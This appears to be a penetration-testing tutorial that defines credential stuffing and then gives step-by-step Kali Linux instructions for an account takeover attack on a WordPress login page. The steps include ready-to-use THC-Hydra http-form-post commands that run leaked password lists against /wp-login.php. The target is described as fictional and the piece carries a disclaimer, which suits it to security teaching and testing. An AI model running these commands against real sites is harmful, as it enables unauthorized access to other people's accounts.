What is Credential Stuffing?
Credential stuffing refers to a form of cyber attack using stolen/leaked/breached account credentials in automated web injection attacks for purposes of attaining unlawful access to user accounts. Such account credentials generally comprise usernames or email addresses and passwords.
The adversarial cyber actor partaking in credential stuffing attacks plainly automates the logins for previously disclosed credential pairs employing typical automated tools such as THC-Hydra and Sentry MBA.
When a substantial amount of breached credentials are automatically submitted into the targeted websites, the threat actor may hijack an existing account successfully if a potential match to the disclosed credentials is found.
The reasons a cyber adversary may want to partake in credential stuffing range from espionage to financial gain. Such credentials may also possibly been purchased following a data breach.
Credential stuffing attacks are not only perilous to particular sectors such as the financial industry but also serve as a viable automated injection for adversaries to utilize since numerous users will always reuse the same password across many different websites.
According to ZDNet, there have been over 30 billion login attempts deploying the credential stuffing attack method being recorded in less than one year between November 2017 and June 2018.
Note: This is a penetration testing tutorial. You are responsible for your own actions.
How To Launch An Account Takeover Attack With Hydra’s Built-in Credential Stuffing Capability In Kali Linux
In this tutorial, we will attempt to launch an account takeover attack on a fictional WordPress site using Hydra and Kali Linux.
1. To begin, go to the directory where the known credentials are located in
For instance, our folder could be located in /home/root/Desktop/Hello. Hello would be the name of the folder.
Hence, type in the following command into the terminal:
cd Desktop/Hello
2. Proceed by typing into the terminal:
ls
The terminal command “ls” refers to List Directory Contents. This will confirm that the credentials are in the folder.
3. Confirm/modify the known credentials (passwords and/or users.txt)
Type the subsequent command into the terminal:
sudo nano passwords.txt
You will see passwords in the file passwords.txt.
Feel free to confirm that these are the credentials or modify accordingly.
Remember to save any changes you’ve made to the file.
If you’ve closed the terminal window after making the changes, Kali Linux will automatically create the file passwords.txt.save in the Hello directory. Simply change the file back to passwords.txt.
4. Enter in the known credentials into the terminal
Go ahead and type in one of the subsequent commands into the terminal:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hydra -L usernames.txt -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1 | |
OR | |
hydra -l admin -P passwords.txt thetargetdomain -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 1 |
Remember to modify the parameters accordingly. Alter the domain with the appropriate extension.
Our example will be a WordPress login page: /wp-login.php
For this tutorial, we will go with one known username: admin
5. Wait For The Brute-force Attack To Finish
The brute-force attack attempts will take some time to complete. This will evidently differ depending on the unique circumstances.
6. Account Takeover Attack: Successful Or Not?
If the credential stuffing attack is successful, we will see the password revealed by Hydra which will also match the known username that was entered into the parameter and terminal.